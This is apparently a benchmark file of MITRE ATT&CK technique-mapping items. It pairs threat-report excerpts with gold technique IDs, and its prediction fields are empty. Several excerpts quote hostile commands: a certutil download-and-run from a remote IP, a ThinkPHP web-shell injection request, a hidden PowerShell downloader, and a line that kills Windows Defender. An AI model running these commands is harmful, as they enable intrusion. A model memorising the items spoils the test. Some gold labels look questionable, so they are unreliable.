+ "input": "\"The adversaries can get detailed information about the victim's machine, as you can see in the screenshot below.Beside the system information, it steals passwords from common web browsers, Filezilla, Beyluxe Messenger, CoreFTP and the video game \"\"Minecraft.\"\" It also starts a keylogger, steals clipboard content, takes screenshots from the desktop and pictures from the webcam\"",
+ "gold": [
+ "T1082",
+ "T1003",
+ "T1113",
+ "T1125"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file",
+ "gold": [
+ "T1547.009",
+ "T1218.011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The DDE instructions attempt to run the following the following command on the victim host, which attempts to download and execute a payload from a remote server: C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\rundll32.exeC:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec_RunDLLC:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -fhxxp://220.158.216[.]127/MScertificate.exe & MScertificate.exe\"\" During our analysis, we observed this DDE downloading and executing a Zebrocy AutoIt downloader (f27836430\u2026), configured to attempt to download an additional payload from 220.158.216[.]127\"",
+ "gold": [
+ "T1036",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The exploitation is issued in three steps: Exploiting CVE-2018-20062 for uploading a PHP shell Using a GET request, a remote command execution vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted server, as shown below: s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ php $action = $_GET[\u2018module\u2019];system($action);? ^>>index.php This shell executes commands sent via the \u201cmodule\u201d parameter in a query",
+ "gold": [
+ "T1059",
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The fact that the actor used Metasploit shellcode within the Unicorn generated PowerShell script leads us to speculate that the ultimate payload of this attack is Meterpreter, which is a shellcode-based payload",
+ "gold": [
+ "T1064",
+ "T1059.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The file will be inflated in order to retrieve a RTF document, this document will be displayed to the infected user by executing Wordpad.Here is the PDB path from the PoohMilk sample:E:\\BIG_POOH\\Project\\milk\\Release\\milk.pdbFreenki SampleThe purpose of Freenki is to collect information on the infected system and to download a third executable",
+ "gold": [
+ "T1082",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The full obfuscated command inside the .lnk file",
+ "gold": [
+ "T1027",
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The keylogger will monitor for active application windows and write them to the log in the following format: [Application Name] The keylogger will log a configurable amount of keystrokes (default 50) before sending the log to the C2 server using the following format: [logged keystrokes] The keylogger can handle logging special keys, such as return and the function keys and will report those within the log in the following format; [special character] Infrastructure The XAgentOSX sample we analyzed was configured to use the following IP address and domain names as its C2 servers: 23.227.196[.]215 apple-iclods[.]org apple-checker[.]org apple-uptoday[.]org apple-search[.]info When we analyzed this sample, the domain names that were used as backup C2 locations were not registered; therefore, these domains did not provide any links to additional infrastructure",
+ "gold": [
+ "T1056",
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The macro performs all of these activities with the following command:cmd /c taskkill /f /im winword.exe&taskkill /f /im Excel.exe&taskkill /f /im MSPUB.exe&taskkill /f /im POWERPNT.EXE&taskkill /f /im MSASCuiL.exe&taskkill /f /im MpCmdRun.exe&cd \"\"\"\"%ProgramFiles%\\Windows Defender\"\"\"\" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exitThe macro also attempts to deactivate security mechanisms within Microsoft Office products by modifying the registry\"",
+ "gold": [
+ "T1055.012",
+ "T1112",
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request: GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=_&continue=dnsadmin After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\hupdate.ex (note \u201cex,\u201d not \u201cexe\u201d) The capability to download additional components from the control server",
+ "gold": [
+ "T1033",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The plugin URL is stored in file in following format: /plugin/index.php?plugin= The following plugins are found in the memory of the Zyklon malware: /plugin/index.php?plugin=cuda /plugin/index.php?plugin=minerd /plugin/index.php?plugin=sgminer /plugin/index.php?plugin=socks /plugin/index.php?plugin=tor /plugin/index.php?plugin=games /plugin/index.php?plugin=software /plugin/index.php?plugin=ftp /plugin/index.php?plugin=email /plugin/index.php?plugin=browser The downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
+ "gold": [
+ "T1027.002",
+ "T1068"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Trojan will respond to the C2 to notify it of a successful upload by sending a URL structured as follows:http:///resp?AAZ The download command (3) reads the contents of a specified file and sends the data to the C2 server",
+ "gold": [
+ "T1105",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Trojan will respond to the C2 with \u201cPRIVMSG : []\u201d",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The webpage contained both CVE-2014-6332 exploit code and a VBScript that invoked PowerShell on the affected users\u2019 system to download the below payload: \u00a0\u00a0\u00a0 function runmumaa() \u00a0\u00a0\u00a0 On Error Resume Next \u00a0\u00a0\u00a0 set shell=createobject(\"\"Shell.Application\"\") \u00a0\u00a0\u00a0 shell.ShellExecute \"\"powershell.exe\"\",\"\"-NoLogo -NoProfile \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 -NonInteractive -WindowStyle Hidden ( New-Object \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u201cSystem.Net.WebClient\u201d).DownloadFile(\u201chttp://www.playboysplus.com\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 /install/install.exe\u201d,\u201dinstall.exe\u201d);Invoke-Item install.exe\"\", \"\"\"\", \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \"\"open\"\", 1 \u00a0\u00a0\u00a0 end function The CVE-2014-6332 exploit code seen in this incident is derived from the code published at http://www.exploit-db.com/exploits/35230/, which has also been incorporated in the Metasploit project\"",
+ "gold": [
+ "T1055.012",
+ "T1036",
+ "T1068"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The webshell will iterate through the IP list and perform a series of commands for each IP, starting off with using the following command to connect to the remote system: net use [IP address] /user:[domain admin username] [domain admin password] 2>&1 After connecting to the remote system with net use, the webshell will run the following command to obtain a list of user folders: dir /b [IP address]\\c$\\Users 2>&1 With a list of user folders, the webshell will iterate through the list of users and enumerate all of the files in the following folders: [IP address]\\c$\\Users\\[username]\\Desktop [IP address]\\c$\\Users\\[username]\\Documents [IP address]\\c$\\Users\\[username]\\Downloads The Network Downloader function will gather all the files in these folders and use 7-Zip to compress and archive the files",
+ "gold": [
+ "T1204",
+ "T1016",
+ "T1033",
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps)",
+ "gold": [
+ "T1064",
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "They utilised Windows commands in order to enumerate and conduct reconnaissance activities such as tasklist.exe, ping.exe, netstat.exe, net.exe, systeminfo.exe, ipconfig.exe and bcp.exe",
+ "gold": [
+ "T1055.012",
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"This version of HALFBAKED connects to the following C2 server: hxxp://198[.]100.119.6:80/cd hxxp://198[.]100.119.6:443/cd hxxp://198[.]100.119.6:8080/cd This version of HALFBAKED listens for the following commands from the C2 server: info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries processList: Send list of process running screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1) runvbs: Executes a VB script runexe: Executes EXE file runps1: Executes PowerShell script delete: Delete the specified file update: Update the specified file All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code: Function send_data(data) \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0random_string = custom_function_to_generate_random_string() \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0encoded_data = URLEncode(SimpleEncrypt(data)) \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0post_data(\"\"POST\u201d, random_string & \"\"=\"\" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id)) The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor\"",
+ "gold": [
+ "T1070.004",
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "UAC bypass via DLL hijacking requires: A Windows executable with the auto-elevate property in its manifest A Windows executable in a secure directory (%systemroot%\\system32) The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\\system32): NTWDBLIB executing the installer batch files under the context of cliconfg.exe.\u00a0 The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll",
+ "gold": [
+ "T1055",
+ "T1548.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "We are not sure if this works, but the command name would suggest it is meant to take a screenshot $command Runs a PowerShell command and sends the output to the C2 slp:\\d+ Sets the sleep interval between C2 beacons $testmode Issues DNS queries of A, AAAA, AC, CNAME, MX, TXT, SRV and SOA types to the C2 servers attempting to determine which DNS query types were successful",
+ "gold": [
+ "T1571",
+ "T1008",
+ "T1043",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When macros are enabled and run, the macro within the Word document searches the sections of the document to get the contents of the header using the following piece of code: Set rng = ActiveDocument.Sections(intSection).Headers(1).Range The code above obtains the contents of the header, which the macro will write to a file at C:\\programdata\\Office365DCOMCheck.ps1",
+ "gold": [
+ "T1204",
+ "T1140",
+ "T1083"
+ ],
+ "predicted": ""
+ }
+]
\ No newline at end of file